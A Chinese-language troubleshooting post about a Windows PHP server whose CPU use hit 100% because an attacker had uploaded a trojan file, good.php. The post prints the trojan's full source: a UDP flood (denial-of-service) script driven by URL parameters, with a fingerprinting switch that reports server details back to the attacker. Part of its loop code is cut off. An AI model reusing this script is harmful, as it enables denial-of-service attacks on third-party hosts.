cpu使用率高
找过很多原因,一直没头绪,发现个新原因希望能帮到大家。
由于服务器配置还算不错,先是单路四核至强,会出现不间断的cpu使用到百分之百100,症状是php-cgi.exe 有
多个,然后加在一起cpu就占了百分之百。出现正常的访问打不开。最开始用防火墙查看还以为是蜘蛛多使服务器负荷重,又加了个cpu
又,现在是双路四核至强cpu 结果还是一样,后来发现C:\Windows\Temp
目录下有个php-5.2.9_errors.log文件很大,而且快把c盘站满了,用记事本打不开,文件太大了,我就先删除,没过几分钟又生成了,打开一看,里面有错误日志。大概说的是我网站下面有个php文件参数不对。进网站目录看原来被人上传了个文件名为good.php的木马,goog.php里面代码贴过大家看看(<?php
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);
if (StrLen($host)==0 or StrLen($port)==0 or
StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo
$_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
echo "Parameters can not be empty!";
exit;
}
for($i=0;$i
$out .= "A";
}
$max_time = time()+$exec_time;
while(1){
$packets++;
if(time()
> $max_time){
break;
}
$fp =
fsockopen("udp://$host", $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "Send
Host:$host:$port
";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024,
2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . "
mb
";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" .
round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>)
到网上查了一下好像是一个php攻击文件,而这个goog.php 是挂马的人随机取的,
把这个goog.php 删除之后就没有出现过cpu 使用率高的现象。